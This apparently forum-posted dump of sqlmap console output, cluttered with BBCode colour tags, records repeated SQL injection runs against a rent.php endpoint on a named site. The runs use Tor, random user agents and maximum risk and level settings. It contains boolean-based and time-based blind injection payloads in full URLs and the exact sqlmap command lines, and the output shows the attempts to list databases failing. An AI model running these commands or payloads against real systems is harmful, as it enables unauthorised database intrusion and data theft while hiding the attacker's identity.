[/COLOR][COLOR="#0000BB"]Type[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]based blind
Title[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]MySQL[/COLOR][COLOR="#007700"]>=[/COLOR][COLOR="#0000BB"]5.0.12[/COLOR][COLOR="#007700"]AND[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]based blind[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]query SLEEP[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]Payload[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//site.org:80/rent.php?country=179&method=get_mobile_count&operator=4&services=33 AND (SELECT 1911 FROM (SELECT(SLEEP(
[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"])))[/COLOR][COLOR="#0000BB"]flbR[/COLOR][COLOR="#007700"])&[/COLOR][COLOR="#0000BB"]timereset[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]2
[/COLOR][COLOR="#007700"]---
[[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]06[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]the back[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]end DBMS is MySQL
web application technology[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Nginx[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]PHP
back[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]end DBMS[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]MySQL[/COLOR][COLOR="#007700"]>=[/COLOR][COLOR="#0000BB"]5.0.12
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]06[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]fetching database names
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]06[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]fetching number of databases
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]06[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]WARNING[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]running in a single[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]thread mode[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]Please consider usage of option[/COLOR][COLOR="#DD0000"]'--threads'[/COLOR][COLOR="#007700"]for[/COLOR][COLOR="#0000BB"]faster data retrieval
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]06[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]retrieved[/COLOR][COLOR="#007700"]:
[[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]08[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]retrieved[/COLOR][COLOR="#007700"]:
[[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]08[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]WARNING[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]it is very important to not stress the network connection during usage of time[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]based payloads to prevent potential disr
uptions
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]09[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]WARNING[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]in[/COLOR][COLOR="#007700"]case[/COLOR][COLOR="#0000BB"]of continuous data retrieval problems you are advised to[/COLOR][COLOR="#007700"]try[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]switch[/COLOR][COLOR="#DD0000"]'--no-cast'[/COLOR][COLOR="#007700"]or switch[/COLOR][COLOR="#DD0000"]'--hex'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]09[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]ERROR[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]unable to retrieve the number of databases
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]09[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]falling back to current database
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]09[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]fetching current database
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]09[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]retrieved[/COLOR][COLOR="#007700"]:
[[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]11[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]retrieved[/COLOR][COLOR="#007700"]:
[[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]CRITICAL[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]unable to retrieve the database names
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]fetched data logged to text files under[/COLOR][COLOR="#DD0000"]'output\site.org'
[/COLOR][COLOR="#007700"][*][/COLOR][COLOR="#0000BB"]ending[/COLOR][COLOR="#007700"]@[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]2019[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]09[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]14[/COLOR][COLOR="#007700"]/
[/COLOR][COLOR="#0000BB"]sqlmap[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]py[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]u[/COLOR][COLOR="#DD0000"]"http://site.org/rent.php?country=179&method=get_mobile
_count&operator=4&services=33*&timereset=2"[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]random[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]agent[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]tor[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]tor[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]type[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]SOCKS5[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]risk[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]level[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]no[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]cast[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]dbs
___
__H__
___ ___[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]']_____ ___ ___ {1.3.9.9#dev}
|_ -| . ["] | .'[/COLOR][COLOR="#007700"]| . |
|[/COLOR][COLOR="#0000BB"]___[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"][.][/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]__[/COLOR][COLOR="#007700"],|[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]|
|[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]V[/COLOR][COLOR="#007700"]... |[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//sqlmap.org
[/COLOR][COLOR="#007700"][!][/COLOR][COLOR="#0000BB"]legal disclaimer[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Usage of sqlmap[/COLOR][COLOR="#007700"]for[/COLOR][COLOR="#0000BB"]attacking targets without prior mutual consent is illegal[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]It is the end user[/COLOR][COLOR="#DD0000"]'s responsibility to
obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by
this program
[*] starting @ 13:03:05 /2019-09-14/
[13:03:05] [WARNING] increasing default value for option '[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]sec[/COLOR][COLOR="#DD0000"]' to 10 because switch '[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]tor[/COLOR][COLOR="#DD0000"]' was provided
[13:03:05] [INFO] setting Tor SOCKS proxy settings
[13:03:06] [INFO] fetched random HTTP User-Agent header value '[/COLOR][COLOR="#0000BB"]Mozilla[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]4.0[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]compatible[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]MSIE 7.0b[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]Windows NT 6.0[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#DD0000"]' from file '[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]agents[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]txt[/COLOR][COLOR="#DD0000"]'
custom injection marker ('[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#DD0000"]') found in option '[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]u[/COLOR][COLOR="#DD0000"]'. Do you want to process it? [Y/n/q] y
[13:03:09] [INFO] resuming back-end DBMS '[/COLOR][COLOR="#0000BB"]mysql[/COLOR][COLOR="#DD0000"]'
[13:03:09] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://site.org:80/rent.php?country=179&method=get_mobile_count&operator=4&services=33 AND 2716=2716&timereset=2
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://site.org:80/rent.php?country=179&method=get_mobile_count&operator=4&services=33 AND (SELECT 1911 FROM (SELECT(SLEEP(
10)))flbR)&timereset=2
---
[13:03:10] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP
back-end DBMS: MySQL >= 5.0.12
[13:03:10] [INFO] fetching database names
[13:03:10] [INFO] fetching number of databases
[13:03:10] [WARNING] running in a single-thread mode. Please consider usage of option '[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]threads[/COLOR][COLOR="#DD0000"]' for faster data retrieval
[13:03:10] [INFO] retrieved:
[13:03:11] [WARNING] it'[/COLOR][COLOR="#0000BB"]s highly recommended to avoid usage of[/COLOR][COLOR="#007700"]switch[/COLOR][COLOR="#DD0000"]'--tor'[/COLOR][COLOR="#007700"]for[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]based injections because of inherent high latency tim
e
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]03[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]11[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]WARNING[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]based comparison requires larger statistical model[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]please wait[/COLOR][COLOR="#007700"]........................... ([/COLOR][COLOR="#0000BB"]done[/COLOR][COLOR="#007700"])
[[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]03[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]37[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]CRITICAL[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]considerable lagging has been detected in connection response[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]s[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#0000BB"]Please[/COLOR][COLOR="#007700"]use as[/COLOR][COLOR="#0000BB"]high value[/COLOR][COLOR="#007700"]for[/COLOR][COLOR="#0000BB"]option[/COLOR][COLOR="#DD0000"]'--time-sec'[/COLOR][COLOR="#007700"]as
[/COLOR][COLOR="#0000BB"]possible[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]g[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"]or[/COLOR][COLOR="#0000BB"]more[/COLOR][COLOR="#007700"])
[[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]03[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]37[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]WARNING[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]it is very important to not stress the network connection during usage of time[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]based payloads to prevent potential disr
uptions
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]03[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]38[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]ERROR[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]unable to retrieve the number of databases
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]03[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]38[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]falling back to current database
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]03[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]38[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]fetching current database
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]03[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]38[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]retrieved[/COLOR][COLOR="#007700"]:
[[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]03[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]40[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]retrieved[/COLOR][COLOR="#007700"]:
[[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]03[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]41[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]CRITICAL[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]unable to retrieve the database names
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]03[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]41[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]fetched data logged to text files under[/COLOR][COLOR="#DD0000"]'output\site.org'
[/COLOR][COLOR="#007700"][*][/COLOR][COLOR="#0000BB"]ending[/COLOR][COLOR="#007700"]@[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]03[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]41[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]2019[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]09[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]14[/COLOR][COLOR="#007700"]/
[/COLOR][COLOR="#0000BB"]sqlmap[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]py[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]u[/COLOR][COLOR="#DD0000"]"http://site.org/rent.php?country=179&method=get_mobile
_count&operator=4&services=33*&timereset=2"[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]random[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]agent[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]tor[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]tor[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]type[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]SOCKS5[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]risk[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]level[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]hex[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]sec[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]dbs
___
__H__
___ ___[/COLOR][COLOR="#007700"][.][/COLOR][COLOR="#0000BB"]_____ ___ ___[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]1.3.9.9[/COLOR][COLOR="#FF8000"]#dev}
[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]-| . [,] | .[/COLOR][COLOR="#DD0000"]'| . |
|___|_ ['[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]__[/COLOR][COLOR="#007700"],|[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]|
|[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]V[/COLOR][COLOR="#007700"]... |[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//sqlmap.org
[/COLOR][COLOR="#007700"][!][/COLOR][COLOR="#0000BB"]legal disclaimer[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Usage of sqlmap[/COLOR][COLOR="#007700"]for[/COLOR][COLOR="#0000BB"]attacking targets without prior mutual consent is illegal[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]It is the end user[/COLOR][COLOR="#DD0000"]'s responsibility to
obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by
this program
[*] starting @ 13:05:03 /2019-09-14/
[13:05:03] [INFO] setting Tor SOCKS proxy settings
[13:05:04] [INFO] fetched random HTTP User-Agent header value '[/COLOR][COLOR="#0000BB"]Mozilla[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]5.0[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]Windows NT 5.1[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]U[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]de[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]rv[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]1.9.1.6[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]Gecko[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]20091201 Firefox[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]3.5.6
Opera 11.00[/COLOR][COLOR="#DD0000"]' from file '[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]agents[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]txt[/COLOR][COLOR="#DD0000"]'
custom injection marker ('[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#DD0000"]') found in option '[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]u[/COLOR][COLOR="#DD0000"]'. Do you want to process it? [Y/n/q] y
[13:05:08] [INFO] resuming back-end DBMS '[/COLOR][COLOR="#0000BB"]mysql[/COLOR][COLOR="#DD0000"]'
[13:05:08] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://site.org:80/rent.php?country=179&method=get_mobile_count&operator=4&services=33 AND 2716=2716&timereset=2
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://site.org:80/rent.php?country=179&method=get_mobile_count&operator=4&services=33 AND (SELECT 1911 FROM (SELECT(SLEEP(
10)))flbR)&timereset=2
---
[13:05:08] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP
back-end DBMS: MySQL >= 5.0.12
[13:05:08] [INFO] fetching database names
[13:05:08] [INFO] fetching number of databases
[13:05:08] [WARNING] running in a single-thread mode. Please consider usage of option '[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]threads[/COLOR][COLOR="#DD0000"]' for faster data retrieval
[13:05:10] [INFO] retrieved:
[13:05:10] [WARNING] it'[/COLOR][COLOR="#0000BB"]s highly recommended to avoid usage of[/COLOR][COLOR="#007700"]switch[/COLOR][COLOR="#DD0000"]'--tor'[/COLOR][COLOR="#007700"]for[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]based injections because of inherent high latency tim
e
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]05[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]WARNING[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]based comparison requires larger statistical model[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]please wait[/COLOR][COLOR="#007700"].......................... ([/COLOR][COLOR="#0000BB"]done[/COLOR][COLOR="#007700"])
[[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]05[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]24[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]WARNING[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]it is very important to not stress the network connection during usage of time[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]based payloads to prevent potential disr
uptions
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]05[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]25[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]retrieved[/COLOR][COLOR="#007700"]:
[[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]05[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]25[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]ERROR[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]unable to retrieve the number of databases
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]05[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]25[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]falling back to current database
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]05[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]25[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]fetching current database
